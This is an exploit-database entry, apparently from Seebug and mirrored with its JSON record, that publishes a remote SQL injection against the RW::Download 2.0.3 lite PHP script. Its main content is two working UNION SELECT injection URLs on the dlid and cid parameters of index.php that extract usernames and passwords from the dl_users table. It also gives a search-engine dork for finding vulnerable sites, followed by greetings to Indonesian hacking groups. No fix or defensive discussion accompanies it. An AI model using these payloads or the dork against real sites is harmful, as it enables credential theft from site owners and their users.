Search...

RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln

2007-09-08T00:00:00

ID SSV:7238
Type seebug
Reporter Root
Modified 2007-09-08T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ########################################################################
# RW::Download v2.0.3 lite - Remote SQL Injection
# Vendor           : http://www.rwscripts.com/
# Ditemukan oleh   : k1tk4t - k1tk4t&#91;4t&#93;newhack.org
# Lokasi           : Indonesia  --  #newhack&#91;dot&#93;org @ irc.dal.net
# Dork             : &quot;Powered by RW::Download v2.0.3 lite&quot;
########################################################################

http://localhost/UPLOAD/index.php?url=&amp;dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*

http://localhost/UPLOAD/index.php?url=&amp;cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*

########################################################################
Terimakasih untuk;
str0ke, DNX
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank
dan semua temen2 komunitas security&amp;hacking
-----------------------
-newhack&#91;dot&#93;org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all member newhack&#91;dot&#93;org
-----------------------
all member www.echo.or.id
-----------------------
all member www.yogyafree.net
-----------------------
all member www.sekuritionline.net
-----------------------
all member www.kecoak-elektronik.net
-----------------------
semua komunitas hacker&amp;security Indonesia
Cintailah Bahasa Indonesia

# sebug.net

JSON Vulners Source

Initial Source

{"id": "SSV:7238", "type": "seebug", "bulletinFamily": "exploit", "title": "RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln", "description": "No description provided by source.", "published": "2007-09-08T00:00:00", "modified": "2007-09-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.seebug.org/vuldb/ssvid-7238", "reporter": "Root", "references": [], "cvelist": [], "lastseen": "2017-11-19T21:58:12", "history": [], "viewCount": 0, "enchantments": {"vulnersScore": 2.8}, "enchantments_done": [], "objectVersion": "1.4", "sourceHref": "https://www.seebug.org/vuldb/ssvid-7238", "sourceData": "\n ########################################################################\n# RW::Download v2.0.3 lite - Remote SQL Injection\n# Vendor : http://www.rwscripts.com/\n# Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org\n# Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net\n# Dork : "Powered by RW::Download v2.0.3 lite"\n########################################################################\n\nhttp://localhost/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*\n\nhttp://localhost/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*\n\n########################################################################\nTerimakasih untuk;\nstr0ke, DNX\nxoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank\ndan semua temen2 komunitas security&hacking\n-----------------------\n-newhack[dot]org|staff-\nmR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX\n-----------------------\nall member newhack[dot]org\n-----------------------\nall member www.echo.or.id\n-----------------------\nall member www.yogyafree.net\n-----------------------\nall member www.sekuritionline.net\n-----------------------\nall member www.kecoak-elektronik.net\n-----------------------\nsemua komunitas hacker&security Indonesia\nCintailah Bahasa Indonesia\n\n# sebug.net\n ", "status": "poc", "_object_type": "robots.models.seebug.SeebugBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"]}